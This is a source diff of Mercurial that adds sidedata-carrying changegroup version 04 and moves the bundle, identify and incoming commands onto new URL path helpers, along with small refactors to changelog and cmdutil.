+ """ + + version = b'04' + + def deltachunk(self, prevnode): + res = super(cg4unpacker, self).deltachunk(prevnode) + if not res: + return res + + (node, p1, p2, cs, deltabase, delta, flags, _sidedata) = res + + sidedata_raw = getchunk(self._stream) + sidedata = {} + if len(sidedata_raw) > 0: + sidedata = sidedatamod.deserialize_sidedata(sidedata_raw) + + return node, p1, p2, cs, deltabase, delta, flags, sidedata + + class headerlessfixup(object): def __init__(self, fh, h): self._h = h @@ -559,7 +662,7 @@ return readexactly(self._fh, n) -def _revisiondeltatochunks(delta, headerfn): +def _revisiondeltatochunks(repo, delta, headerfn): """Serialize a revisiondelta to changegroup chunks.""" # The captured revision delta may be encoded as a delta against @@ -585,6 +688,13 @@ yield prefix yield data + sidedata = delta.sidedata + if sidedata is not None: + # Need a separate chunk for sidedata to be able to differentiate + # "raw delta" length and sidedata length + yield chunkheader(len(sidedata)) + yield sidedata + def _sortnodesellipsis(store, nodes, cl, lookup): """Sort nodes for changegroup generation.""" @@ -678,7 +788,7 @@ # We failed to resolve a parent for this node, so # we crash the changegroup construction. raise error.Abort( - b'unable to resolve parent while packing %r %r' + b"unable to resolve parent while packing '%s' %r" b' for changeset %r' % (store.indexfile, rev, clrev) ) @@ -709,6 +819,7 @@ clrevtolocalrev=None, fullclnodes=None, precomputedellipsis=None, + sidedata_helpers=None, ): """Calculate deltas for a set of revisions. @@ -716,6 +827,8 @@ If topic is not None, progress detail will be generated using this topic name (e.g. changesets, manifests, etc). + + See `storageutil.emitrevisions` for the doc on `sidedata_helpers`. 
""" if not nodes: return @@ -814,6 +927,7 @@ revisiondata=True, assumehaveparentrevisions=not ellipses, deltamode=deltamode, + sidedata_helpers=sidedata_helpers, ) for i, revision in enumerate(revisions): @@ -854,6 +968,7 @@ shallow=False, ellipsisroots=None, fullnodes=None, + remote_sidedata=None, ): """Given a source repo, construct a bundler. @@ -886,6 +1001,8 @@ nodes. We store this rather than the set of nodes that should be ellipsis because for very large histories we expect this to be significantly smaller. + + remote_sidedata is the set of sidedata categories wanted by the remote. """ assert oldmatcher assert matcher @@ -902,6 +1019,9 @@ if bundlecaps is None: bundlecaps = set() self._bundlecaps = bundlecaps + if remote_sidedata is None: + remote_sidedata = set() + self._remote_sidedata = remote_sidedata self._isshallow = shallow self._fullclnodes = fullnodes @@ -928,11 +1048,26 @@ self._verbosenote(_(b'uncompressed size of bundle content:\n')) size = 0 + sidedata_helpers = None + if self.version == b'04': + remote_sidedata = self._remote_sidedata + if source == b'strip': + # We're our own remote when stripping, get the no-op helpers + # TODO a better approach would be for the strip bundle to + # correctly advertise its sidedata categories directly. 
+ remote_sidedata = repo._wanted_sidedata + sidedata_helpers = get_sidedata_helpers(repo, remote_sidedata) + clstate, deltas = self._generatechangelog( - cl, clnodes, generate=changelog + cl, + clnodes, + generate=changelog, + sidedata_helpers=sidedata_helpers, ) for delta in deltas: - for chunk in _revisiondeltatochunks(delta, self._builddeltaheader): + for chunk in _revisiondeltatochunks( + self._repo, delta, self._builddeltaheader + ): size += len(chunk) yield chunk @@ -977,17 +1112,20 @@ fnodes, source, clstate[b'clrevtomanifestrev'], + sidedata_helpers=sidedata_helpers, ) for tree, deltas in it: if tree: - assert self.version == b'03' + assert self.version in (b'03', b'04') chunk = _fileheader(tree) size += len(chunk) yield chunk for delta in deltas: - chunks = _revisiondeltatochunks(delta, self._builddeltaheader) + chunks = _revisiondeltatochunks( + self._repo, delta, self._builddeltaheader + ) for chunk in chunks: size += len(chunk) yield chunk @@ -1002,7 +1140,7 @@ mfdicts = None if self._ellipses and self._isshallow: mfdicts = [ - (self._repo.manifestlog[n].read(), lr) + (repo.manifestlog[n].read(), lr) for (n, lr) in pycompat.iteritems(manifests) ] @@ -1017,6 +1155,7 @@ fastpathlinkrev, fnodes, clrevs, + sidedata_helpers=sidedata_helpers, ) for path, deltas in it: @@ -1025,7 +1164,9 @@ yield h for delta in deltas: - chunks = _revisiondeltatochunks(delta, self._builddeltaheader) + chunks = _revisiondeltatochunks( + self._repo, delta, self._builddeltaheader + ) for chunk in chunks: size += len(chunk) yield chunk @@ -1041,7 +1182,9 @@ if clnodes: repo.hook(b'outgoing', node=hex(clnodes[0]), source=source) - def _generatechangelog(self, cl, nodes, generate=True): + def _generatechangelog( + self, cl, nodes, generate=True, sidedata_helpers=None + ): """Generate data for changelog chunks. 
Returns a 2-tuple of a dict containing state and an iterable of @@ -1050,6 +1193,8 @@ if generate is False, the state will be fully populated and no chunk stream will be yielded + + See `storageutil.emitrevisions` for the doc on `sidedata_helpers`. """ clrevorder = {} manifests = {} @@ -1133,6 +1278,7 @@ clrevtolocalrev={}, fullclnodes=self._fullclnodes, precomputedellipsis=self._precomputedellipsis, + sidedata_helpers=sidedata_helpers, ) return state, gen @@ -1146,11 +1292,14 @@ fnodes, source, clrevtolocalrev, + sidedata_helpers=None, ): """Returns an iterator of changegroup chunks containing manifests. `source` is unused here, but is used by extensions like remotefilelog to change what is sent based in pulls vs pushes, etc. + + See `storageutil.emitrevisions` for the doc on `sidedata_helpers`. """ repo = self._repo mfl = repo.manifestlog @@ -1240,6 +1389,7 @@ clrevtolocalrev=clrevtolocalrev, fullclnodes=self._fullclnodes, precomputedellipsis=self._precomputedellipsis, + sidedata_helpers=sidedata_helpers, ) if not self._oldmatcher.visitdir(store.tree[:-1]): @@ -1278,6 +1428,7 @@ fastpathlinkrev, fnodes, clrevs, + sidedata_helpers=None, ): changedfiles = [ f @@ -1372,6 +1523,7 @@ clrevtolocalrev=clrevtolocalrev, fullclnodes=self._fullclnodes, precomputedellipsis=self._precomputedellipsis, + sidedata_helpers=sidedata_helpers, ) yield fname, deltas @@ -1388,6 +1540,7 @@ shallow=False, ellipsisroots=None, fullnodes=None, + remote_sidedata=None, ): builddeltaheader = lambda d: _CHANGEGROUPV1_DELTA_HEADER.pack( d.node, d.p1node, d.p2node, d.linknode @@ -1418,6 +1571,7 @@ shallow=False, ellipsisroots=None, fullnodes=None, + remote_sidedata=None, ): builddeltaheader = lambda d: _CHANGEGROUPV2_DELTA_HEADER.pack( d.node, d.p1node, d.p2node, d.basenode, d.linknode @@ -1447,6 +1601,7 @@ shallow=False, ellipsisroots=None, fullnodes=None, + remote_sidedata=None, ): builddeltaheader = lambda d: _CHANGEGROUPV3_DELTA_HEADER.pack( d.node, d.p1node, d.p2node, d.basenode, 
d.linknode, d.flags @@ -1467,12 +1622,47 @@ ) +def _makecg4packer( + repo, + oldmatcher, + matcher, + bundlecaps, + ellipses=False, + shallow=False, + ellipsisroots=None, + fullnodes=None, + remote_sidedata=None, +): + # Same header func as cg3. Sidedata is in a separate chunk from the delta to + # differenciate "raw delta" and sidedata. + builddeltaheader = lambda d: _CHANGEGROUPV3_DELTA_HEADER.pack( + d.node, d.p1node, d.p2node, d.basenode, d.linknode, d.flags + ) + + return cgpacker( + repo, + oldmatcher, + matcher, + b'04', + builddeltaheader=builddeltaheader, + manifestsend=closechunk(), + bundlecaps=bundlecaps, + ellipses=ellipses, + shallow=shallow, + ellipsisroots=ellipsisroots, + fullnodes=fullnodes, + remote_sidedata=remote_sidedata, + ) + + _packermap = { b'01': (_makecg1packer, cg1unpacker), # cg2 adds support for exchanging generaldelta b'02': (_makecg2packer, cg2unpacker), # cg3 adds support for exchanging revlog flags and treemanifests b'03': (_makecg3packer, cg3unpacker), + # ch4 adds support for exchanging sidedata + b'04': (_makecg4packer, cg4unpacker), } @@ -1492,11 +1682,9 @@ # # (or even to push subset of history) needv03 = True - if b'exp-sidedata-flag' in repo.requirements: - needv03 = True - # don't attempt to use 01/02 until we do sidedata cleaning - versions.discard(b'01') - versions.discard(b'02') + has_revlogv2 = requirements.REVLOGV2_REQUIREMENT in repo.requirements + if not has_revlogv2: + versions.discard(b'04') if not needv03: versions.discard(b'03') return versions @@ -1543,7 +1731,7 @@ # will support. For example, all hg versions that support generaldelta also # support changegroup 02. 
versions = supportedoutgoingversions(repo) - if b'generaldelta' in repo.requirements: + if requirements.GENERALDELTA_REQUIREMENT in repo.requirements: versions.discard(b'01') assert versions return min(versions) @@ -1559,6 +1747,7 @@ shallow=False, ellipsisroots=None, fullnodes=None, + remote_sidedata=None, ): assert version in supportedoutgoingversions(repo) @@ -1595,6 +1784,7 @@ shallow=shallow, ellipsisroots=ellipsisroots, fullnodes=fullnodes, + remote_sidedata=remote_sidedata, ) @@ -1638,8 +1828,15 @@ fastpath=False, bundlecaps=None, matcher=None, + remote_sidedata=None, ): - bundler = getbundler(version, repo, bundlecaps=bundlecaps, matcher=matcher) + bundler = getbundler( + version, + repo, + bundlecaps=bundlecaps, + matcher=matcher, + remote_sidedata=remote_sidedata, + ) repo = repo.unfiltered() commonrevs = outgoing.common @@ -1658,7 +1855,15 @@ return bundler.generate(commonrevs, csets, fastpathlinkrev, source) -def _addchangegroupfiles(repo, source, revmap, trp, expectedfiles, needfiles): +def _addchangegroupfiles( + repo, + source, + revmap, + trp, + expectedfiles, + needfiles, + addrevisioncb=None, +): revisions = 0 files = 0 progress = repo.ui.makeprogress( @@ -1673,7 +1878,13 @@ o = len(fl) try: deltas = source.deltaiter() - if not fl.addgroup(deltas, revmap, trp): + added = fl.addgroup( + deltas, + revmap, + trp, + addrevisioncb=addrevisioncb, + ) + if not added: raise error.Abort(_(b"received file revlog group is empty")) except error.CensoredBaseError as e: raise error.Abort(_(b"received delta base is censored: %s") % e) @@ -1702,3 +1913,25 @@ ) return revisions, files + + +def get_sidedata_helpers(repo, remote_sd_categories, pull=False): + # Computers for computing sidedata on-the-fly + sd_computers = collections.defaultdict(list) + # Computers for categories to remove from sidedata + sd_removers = collections.defaultdict(list) + + to_generate = remote_sd_categories - repo._wanted_sidedata + to_remove = repo._wanted_sidedata - remote_sd_categories 
+ if pull: + to_generate, to_remove = to_remove, to_generate + + for revlog_kind, computers in repo._sidedata_computers.items(): + for category, computer in computers.items(): + if category in to_generate: + sd_computers[revlog_kind].append(computer) + if category in to_remove: + sd_removers[revlog_kind].append(computer) + + sidedata_helpers = (repo, sd_computers, sd_removers) + return sidedata_helpers diff --git a/mercurial/changelog.py b/mercurial/changelog.py --- a/mercurial/changelog.py +++ b/mercurial/changelog.py @@ -1,6 +1,6 @@ # changelog.py - changelog class for mercurial # -# Copyright 2005-2007 Matt Mackall <mpm@selenic.com> +# Copyright 2005-2007 Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. @@ -191,7 +191,7 @@ # Extensions might modify _defaultextra, so let the constructor below pass # it in extra = attr.ib() - manifest = attr.ib(default=nullid) + manifest = attr.ib() user = attr.ib(default=b'') date = attr.ib(default=(0, 0)) files = attr.ib(default=attr.Factory(list)) @@ -200,6 +200,7 @@ p1copies = attr.ib(default=None) p2copies = attr.ib(default=None) description = attr.ib(default=b'') + branchinfo = attr.ib(default=(_defaultextra[b'branch'], False)) class changelogrevision(object): @@ -218,9 +219,9 @@ '_changes', ) - def __new__(cls, text, sidedata, cpsd): + def __new__(cls, cl, text, sidedata, cpsd): if not text: - return _changelogrevision(extra=_defaultextra) + return _changelogrevision(extra=_defaultextra, manifest=nullid) self = super(changelogrevision, cls).__new__(cls) # We could return here and implement the following as an __init__. 
@@ -372,9 +373,14 @@ def description(self): return encoding.tolocal(self._text[self._offsets[3] + 2 :]) + @property + def branchinfo(self): + extra = self.extra + return encoding.tolocal(extra.get(b"branch")), b'close' in extra + class changelog(revlog.revlog): - def __init__(self, opener, trypending=False): + def __init__(self, opener, trypending=False, concurrencychecker=None): """Load a changelog revlog using an opener. If ``trypending`` is true, we attempt to load the index from a @@ -383,6 +389,9 @@ revision) data for a transaction that hasn't been finalized yet. It exists in a separate file to facilitate readers (such as hooks processes) accessing data before a transaction is finalized. + + ``concurrencychecker`` will be passed to the revlog init function, see + the documentation there. """ if trypending and opener.exists(b'00changelog.i.a'): indexfile = b'00changelog.i.a' @@ -398,6 +407,7 @@ checkambig=True, mmaplargeindex=True, persistentnodemap=opener.options.get(b'persistent-nodemap', False), + concurrencychecker=concurrencychecker, ) if self._initempty and (self.version & 0xFFFF == revlog.REVLOGV1): @@ -418,6 +428,7 @@ self._filteredrevs = frozenset() self._filteredrevs_hashcache = {} self._copiesstorage = opener.options.get(b'copies-storage') + self.revlog_kind = b'changelog' @property def filteredrevs(self): @@ -497,7 +508,7 @@ if not self._delayed: revlog.revlog._enforceinlinesize(self, tr, fp) - def read(self, node): + def read(self, nodeorrev): """Obtain data from a parsed changelog revision. Returns a 6-tuple of: @@ -513,9 +524,9 @@ ``changelogrevision`` instead, as it is faster for partial object access. 
""" - d, s = self._revisiondata(node) + d, s = self._revisiondata(nodeorrev) c = changelogrevision( - d, s, self._copiesstorage == b'changeset-sidedata' + self, d, s, self._copiesstorage == b'changeset-sidedata' ) return (c.manifest, c.user, c.date, c.files, c.description, c.extra) @@ -523,14 +534,14 @@ """Obtain a ``changelogrevision`` for a node or revision.""" text, sidedata = self._revisiondata(nodeorrev) return changelogrevision( - text, sidedata, self._copiesstorage == b'changeset-sidedata' + self, text, sidedata, self._copiesstorage == b'changeset-sidedata' ) - def readfiles(self, node): + def readfiles(self, nodeorrev): """ short version of read that only returns the files modified by the cset """ - text = self.revision(node) + text = self.revision(nodeorrev) if not text: return [] last = text.index(b"\n\n") @@ -592,21 +603,21 @@ parseddate = b"%s %s" % (parseddate, extra) l = [hex(manifest), user, parseddate] + sortedfiles + [b"", desc] text = b"\n".join(l) - return self.addrevision( + rev = self.addrevision( text, transaction, len(self), p1, p2, sidedata=sidedata, flags=flags ) + return self.node(rev) def branchinfo(self, rev): """return the branch name and open/close state of a revision This function exists because creating a changectx object just to access this is costly.""" - extra = self.changelogrevision(rev).extra - return encoding.tolocal(extra.get(b"branch")), b'close' in extra + return self.changelogrevision(rev).branchinfo - def _nodeduplicatecallback(self, transaction, node): + def _nodeduplicatecallback(self, transaction, rev): # keep track of revisions that got "re-added", eg: unbunde of know rev. 
# # We track them in a list to preserve their order from the source bundle duplicates = transaction.changes.setdefault(b'revduplicates', []) - duplicates.append(self.rev(node)) + duplicates.append(rev) diff --git a/mercurial/cmdutil.py b/mercurial/cmdutil.py --- a/mercurial/cmdutil.py +++ b/mercurial/cmdutil.py @@ -1,6 +1,6 @@ # cmdutil.py - help for command processing in mercurial # -# Copyright 2005-2007 Matt Mackall <mpm@selenic.com> +# Copyright 2005-2007 Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. @@ -16,6 +16,7 @@ from .node import ( hex, nullid, + nullrev, short, ) from .pycompat import ( @@ -1936,12 +1937,12 @@ ui.debug(b'message:\n%s\n' % (message or b'')) if len(parents) == 1: - parents.append(repo[nullid]) + parents.append(repo[nullrev]) if opts.get(b'exact'): if not nodeid or not p1: raise error.InputError(_(b'not a Mercurial patch')) p1 = repo[p1] - p2 = repo[p2 or nullid] + p2 = repo[p2 or nullrev] elif p2: try: p1 = repo[p1] @@ -1951,10 +1952,10 @@ # first parent. if p1 != parents[0]: p1 = parents[0] - p2 = repo[nullid] + p2 = repo[nullrev] except error.RepoError: p1, p2 = parents - if p2.node() == nullid: + if p2.rev() == nullrev: ui.warn( _( b"warning: import the patch as a normal revision\n" @@ -2967,20 +2968,6 @@ # Reroute the working copy parent to the new changeset repo.setparents(newid, nullid) - mapping = {old.node(): (newid,)} - obsmetadata = None - if opts.get(b'note'): - obsmetadata = {b'note': encoding.fromlocal(opts[b'note'])} - backup = ui.configbool(b'rewrite', b'backup-bundle') - scmutil.cleanupnodes( - repo, - mapping, - b'amend', - metadata=obsmetadata, - fixphase=True, - targetphase=commitphase, - backup=backup, - ) # Fixing the dirstate because localrepo.commitctx does not update # it. 
This is rather convenient because we did not need to update @@ -3003,6 +2990,21 @@ for f in removedfiles: dirstate.drop(f) + mapping = {old.node(): (newid,)} + obsmetadata = None + if opts.get(b'note'): + obsmetadata = {b'note': encoding.fromlocal(opts[b'note'])} + backup = ui.configbool(b'rewrite', b'backup-bundle') + scmutil.cleanupnodes( + repo, + mapping, + b'amend', + metadata=obsmetadata, + fixphase=True, + targetphase=commitphase, + backup=backup, + ) + return newid @@ -3774,7 +3776,7 @@ raise error.StateError(state.msg(), hint=state.hint()) for s in statemod._unfinishedstates: - if s._opname == b'merge' or state._reportonly: + if s._opname == b'merge' or s._reportonly: continue if s._clearable and s.isunfinished(repo): util.unlink(repo.vfs.join(s._fname)) diff --git a/mercurial/commands.py b/mercurial/commands.py --- a/mercurial/commands.py +++ b/mercurial/commands.py @@ -1,6 +1,6 @@ # commands.py - command processing for mercurial # -# Copyright 2005-2007 Matt Mackall <mpm@selenic.com> +# Copyright 2005-2007 Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. 
@@ -74,8 +74,15 @@ from .utils import ( dateutil, stringutil, + urlutil, ) +if pycompat.TYPE_CHECKING: + from typing import ( + List, + ) + + table = {} table.update(debugcommandsmod.command._table) @@ -1107,9 +1114,8 @@ transition = b"bad" state[transition].append(node) ctx = repo[node] - ui.status( - _(b'changeset %d:%s: %s\n') % (ctx.rev(), ctx, transition) - ) + summary = cmdutil.format_changeset_summary(ui, ctx, b'bisect') + ui.status(_(b'changeset %s: %s\n') % (summary, transition)) hbisect.checkstate(state) # bisect nodes, changesets, bgood = hbisect.bisect(repo, state) @@ -1125,15 +1131,15 @@ nodes, changesets, good = hbisect.bisect(repo, state) if extend: if not changesets: - extendnode = hbisect.extendrange(repo, state, nodes, good) - if extendnode is not None: + extendctx = hbisect.extendrange(repo, state, nodes, good) + if extendctx is not None: ui.write( - _(b"Extending search to changeset %d:%s\n") - % (extendnode.rev(), extendnode) + _(b"Extending search to changeset %s\n") + % cmdutil.format_changeset_summary(ui, extendctx, b'bisect') ) - state[b'current'] = [extendnode.node()] + state[b'current'] = [extendctx.node()] hbisect.save_state(repo, state) - return mayupdate(repo, extendnode.node()) + return mayupdate(repo, extendctx.node()) raise error.StateError(_(b"nothing to extend")) if changesets == 0: @@ -1146,12 +1152,13 @@ while size <= changesets: tests, size = tests + 1, size * 2 rev = repo.changelog.rev(node) + summary = cmdutil.format_changeset_summary(ui, repo[rev], b'bisect') ui.write( _( - b"Testing changeset %d:%s " + b"Testing changeset %s " b"(%d changesets remaining, ~%d tests)\n" ) - % (rev, short(node), changesets, tests) + % (summary, changesets, tests) ) state[b'current'] = [node] hbisect.save_state(repo, state) @@ -1524,10 +1531,10 @@ ), ] + remoteopts, - _(b'[-f] [-t BUNDLESPEC] [-a] [-r REV]... [--base REV]... FILE [DEST]'), + _(b'[-f] [-t BUNDLESPEC] [-a] [-r REV]... [--base REV]... 
FILE [DEST]...'), helpcategory=command.CATEGORY_IMPORT_EXPORT, ) -def bundle(ui, repo, fname, dest=None, **opts): +def bundle(ui, repo, fname, *dests, **opts): """create a bundle file Generate a bundle file containing data to be transferred to another @@ -1538,7 +1545,7 @@ all the nodes you specify with --base parameters. Otherwise, hg will assume the repository has all the nodes in destination, or default-push/default if no destination is specified, where destination - is the repository you provide through DEST option. + is the repositories you provide through DEST option. You can change bundle format with the -t/--type option. See :hg:`help bundlespec` for documentation on this format. By default, @@ -1583,9 +1590,9 @@ ) if opts.get(b'all'): - if dest: + if dests: raise error.InputError( - _(b"--all is incompatible with specifying a destination") + _(b"--all is incompatible with specifying destinations") ) if opts.get(b'base'): ui.warn(_(b"ignoring --base because --all was specified\n")) @@ -1598,31 +1605,54 @@ ) if base: - if dest: + if dests: raise error.InputError( - _(b"--base is incompatible with specifying a destination") + _(b"--base is incompatible with specifying destinations") ) common = [repo[rev].node() for rev in base] heads = [repo[r].node() for r in revs] if revs else None outgoing = discovery.outgoing(repo, common, heads) + missing = outgoing.missing + excluded = outgoing.excluded else: - dest = ui.expandpath(dest or b'default-push', dest or b'default') - dest, branches = hg.parseurl(dest, opts.get(b'branch')) - other = hg.peer(repo, opts, dest) - revs = [repo[r].hex() for r in revs] - revs, checkout = hg.addbranchrevs(repo, repo, branches, revs) - heads = revs and pycompat.maplist(repo.lookup, revs) or revs - outgoing = discovery.findcommonoutgoing( - repo, - other, - onlyheads=heads, - force=opts.get(b'force'), - portable=True, + missing = set() + excluded = set() + for path in urlutil.get_push_paths(repo, ui, dests): + other = hg.peer(repo, 
opts, path.rawloc) + if revs is not None: + hex_revs = [repo[r].hex() for r in revs] + else: + hex_revs = None + branches = (path.branch, []) + head_revs, checkout = hg.addbranchrevs( + repo, repo, branches, hex_revs + ) + heads = ( + head_revs + and pycompat.maplist(repo.lookup, head_revs) + or head_revs + ) + outgoing = discovery.findcommonoutgoing( + repo, + other, + onlyheads=heads, + force=opts.get(b'force'), + portable=True, + ) + missing.update(outgoing.missing) + excluded.update(outgoing.excluded) + + if not missing: + scmutil.nochangesfound(ui, repo, not base and excluded) + return 1 + + if heads: + outgoing = discovery.outgoing( + repo, missingroots=missing, ancestorsof=heads ) - - if not outgoing.missing: - scmutil.nochangesfound(ui, repo, not base and outgoing.excluded) - return 1 + else: + outgoing = discovery.outgoing(repo, missingroots=missing) + outgoing.excluded = sorted(excluded) if cgversion == b'01': # bundle1 bversion = b'HG10' + bundlespec.wirecompression @@ -1648,6 +1678,14 @@ if complevel is not None: compopts[b'level'] = complevel + compthreads = ui.configint( + b'experimental', b'bundlecompthreads.' + bundlespec.compression + ) + if compthreads is None: + compthreads = ui.configint(b'experimental', b'bundlecompthreads') + if compthreads is not None: + compopts[b'threads'] = compthreads + # Bundling of obsmarker and phases is optional as not all clients # support the necessary features. cfg = ui.configbool @@ -2399,7 +2437,8 @@ To undo marking a destination file as copied, use --forget. With that option, all given (positional) arguments are unmarked as copies. The - destination file(s) will be left in place (still tracked). + destination file(s) will be left in place (still tracked). Note that + :hg:`copy --forget` behaves the same way as :hg:`rename --forget`. This command takes effect with the next commit by default. 
@@ -2550,7 +2589,7 @@ if change: repo = scmutil.unhidehashlikerevs(repo, [change], b'nowarn') ctx2 = scmutil.revsingle(repo, change, None) - ctx1 = ctx2.p1() + ctx1 = logcmdutil.diff_parent(ctx2) elif from_rev or to_rev: repo = scmutil.unhidehashlikerevs( repo, [from_rev] + [to_rev], b'nowarn' @@ -3287,7 +3326,8 @@ ) # checking that newnodes exist because old state files won't have it elif statedata.get(b'newnodes') is not None: - statedata[b'newnodes'].append(node) + nn = statedata[b'newnodes'] # type: List[bytes] + nn.append(node) # remove state when we complete successfully if not opts.get(b'dry_run'): @@ -3821,132 +3861,140 @@ output = [] revs = [] - if source: - source, branches = hg.parseurl(ui.expandpath(source)) - peer = hg.peer(repo or ui, opts, source) # only pass ui when no repo - repo = peer.local() - revs, checkout = hg.addbranchrevs(repo, peer, branches, None) - - fm = ui.formatter(b'identify', opts) - fm.startitem() - - if not repo: - if num or branch or tags: - raise error.InputError( - _(b"can't query remote revision number, branch, or tags") + peer = None + try: + if source: + source, branches = urlutil.get_unique_pull_path( + b'identify', repo, ui, source ) - if not rev and revs: - rev = revs[0] - if not rev: - rev = b"tip" - - remoterev = peer.lookup(rev) - hexrev = fm.hexfunc(remoterev) - if default or id: - output = [hexrev] - fm.data(id=hexrev) - - @util.cachefunc - def getbms(): - bms = [] - - if b'bookmarks' in peer.listkeys(b'namespaces'): - hexremoterev = hex(remoterev) - bms = [ - bm - for bm, bmr in pycompat.iteritems( - peer.listkeys(b'bookmarks') + # only pass ui when no repo + peer = hg.peer(repo or ui, opts, source) + repo = peer.local() + revs, checkout = hg.addbranchrevs(repo, peer, branches, None) + + fm = ui.formatter(b'identify', opts) + fm.startitem() + + if not repo: + if num or branch or tags: + raise error.InputError( + _(b"can't query remote revision number, branch, or tags") + ) + if not rev and revs: + rev = revs[0] + if 
not rev: + rev = b"tip" + + remoterev = peer.lookup(rev) + hexrev = fm.hexfunc(remoterev) + if default or id: + output = [hexrev] + fm.data(id=hexrev) + + @util.cachefunc + def getbms(): + bms = [] + + if b'bookmarks' in peer.listkeys(b'namespaces'): + hexremoterev = hex(remoterev) + bms = [ + bm + for bm, bmr in pycompat.iteritems( + peer.listkeys(b'bookmarks') + ) + if bmr == hexremoterev + ] + + return sorted(bms) + + if fm.isplain(): + if bookmarks: + output.extend(getbms()) + elif default and not ui.quiet: + # multiple bookmarks for a single parent separated by '/' + bm = b'/'.join(getbms()) + if bm: + output.append(bm) + else: + fm.data(node=hex(remoterev)) + if bookmarks or b'bookmarks' in fm.datahint(): + fm.data(bookmarks=fm.formatlist(getbms(), name=b'bookmark')) + else: + if rev: + repo = scmutil.unhidehashlikerevs(repo, [rev], b'nowarn') + ctx = scmutil.revsingle(repo, rev, None) + + if ctx.rev() is None: + ctx = repo[None] + parents = ctx.parents() + taglist = [] + for p in parents: + taglist.extend(p.tags()) + + dirty = b"" + if ctx.dirty(missing=True, merge=False, branch=False): + dirty = b'+' + fm.data(dirty=dirty) + + hexoutput = [fm.hexfunc(p.node()) for p in parents] + if default or id: + output = [b"%s%s" % (b'+'.join(hexoutput), dirty)] + fm.data(id=b"%s%s" % (b'+'.join(hexoutput), dirty)) + + if num: + numoutput = [b"%d" % p.rev() for p in parents] + output.append(b"%s%s" % (b'+'.join(numoutput), dirty)) + + fm.data( + parents=fm.formatlist( + [fm.hexfunc(p.node()) for p in parents], name=b'node' ) - if bmr == hexremoterev - ] - - return sorted(bms) - - if fm.isplain(): - if bookmarks: - output.extend(getbms()) - elif default and not ui.quiet: + ) + else: + hexoutput = fm.hexfunc(ctx.node()) + if default or id: + output = [hexoutput] + fm.data(id=hexoutput) + + if num: + output.append(pycompat.bytestr(ctx.rev())) + taglist = ctx.tags() + + if default and not ui.quiet: + b = ctx.branch() + if b != b'default': + output.append(b"(%s)" % b) + + # 
multiple tags for a single parent separated by '/' + t = b'/'.join(taglist) + if t: + output.append(t) + # multiple bookmarks for a single parent separated by '/' - bm = b'/'.join(getbms()) + bm = b'/'.join(ctx.bookmarks()) if bm: output.append(bm) - else: - fm.data(node=hex(remoterev)) - if bookmarks or b'bookmarks' in fm.datahint(): - fm.data(bookmarks=fm.formatlist(getbms(), name=b'bookmark')) - else: - if rev: - repo = scmutil.unhidehashlikerevs(repo, [rev], b'nowarn') - ctx = scmutil.revsingle(repo, rev, None) - - if ctx.rev() is None: - ctx = repo[None] - parents = ctx.parents() - taglist = [] - for p in parents: - taglist.extend(p.tags()) - - dirty = b"" - if ctx.dirty(missing=True, merge=False, branch=False): - dirty = b'+' - fm.data(dirty=dirty) - - hexoutput = [fm.hexfunc(p.node()) for p in parents] - if default or id: - output = [b"%s%s" % (b'+'.join(hexoutput), dirty)] - fm.data(id=b"%s%s" % (b'+'.join(hexoutput), dirty)) - - if num: - numoutput = [b"%d" % p.rev() for p in parents] - output.append(b"%s%s" % (b'+'.join(numoutput), dirty)) - - fm.data( - parents=fm.formatlist( - [fm.hexfunc(p.node()) for p in parents], name=b'node' - ) - ) - else: - hexoutput = fm.hexfunc(ctx.node()) - if default or id: - output = [hexoutput] - fm.data(id=hexoutput) - - if num: - output.append(pycompat.bytestr(ctx.rev())) - taglist = ctx.tags() - - if default and not ui.quiet: - b = ctx.branch() - if b != b'default': - output.append(b"(%s)" % b) - - # multiple tags for a single parent separated by '/' - t = b'/'.join(taglist) - if t: - output.append(t) - - # multiple bookmarks for a single parent separated by '/' - bm = b'/'.join(ctx.bookmarks()) - if bm: - output.append(bm) - else: - if branch: - output.append(ctx.branch()) - - if tags: - output.extend(taglist) - - if bookmarks: - output.extend(ctx.bookmarks()) - - fm.data(node=ctx.hex()) - fm.data(branch=ctx.branch()) - fm.data(tags=fm.formatlist(taglist, name=b'tag', sep=b':')) - 
fm.data(bookmarks=fm.formatlist(ctx.bookmarks(), name=b'bookmark')) - fm.context(ctx=ctx) - - fm.plain(b"%s\n" % b' '.join(output)) - fm.end() + else: + if branch: + output.append(ctx.branch()) + + if tags: + output.extend(taglist) + + if bookmarks: + output.extend(ctx.bookmarks()) + + fm.data(node=ctx.hex()) + fm.data(branch=ctx.branch()) + fm.data(tags=fm.formatlist(taglist, name=b'tag', sep=b':')) + fm.data(bookmarks=fm.formatlist(ctx.bookmarks(), name=b'bookmark')) + fm.context(ctx=ctx) + + fm.plain(b"%s\n" % b' '.join(output)) + fm.end() + finally: + if peer: + peer.close() @command( @@ -4288,22 +4336,22 @@ cmdutil.check_incompatible_arguments(opts, b'subrepos', [b'bundle']) if opts.get(b'bookmarks'): - source, branches = hg.parseurl( - ui.expandpath(source), opts.get(b'branch') - ) - other = hg.peer(repo, opts, source) - if b'bookmarks' not in other.listkeys(b'namespaces'): - ui.warn(_(b"remote doesn't support bookmarks\n")) - return 0 - ui.pager(b'incoming') - ui.status(_(b'comparing with %s\n') % util.hidepassword(source)) - return bookmarks.incoming(ui, repo, other) - - repo._subtoppath = ui.expandpath(source) - try: - return hg.incoming(ui, repo, source, opts) - finally: - del repo._subtoppath + srcs = urlutil.get_pull_paths(repo, ui, [source], opts.get(b'branch')) + for source, branches in srcs: + other = hg.peer(repo, opts, source) + try: + if b'bookmarks' not in other.listkeys(b'namespaces'): + ui.warn(_(b"remote doesn't support bookmarks\n")) + return 0 + ui.pager(b'incoming') + ui.status( + _(b'comparing with %s\n') % urlutil.hidepassword(source) + ) + return bookmarks.incoming(ui, repo, other) + finally: + other.close() + + return hg.incoming(ui, repo, source, opts) @command( @@ -4328,7 +4376,9 @@ Returns 0 on success. 
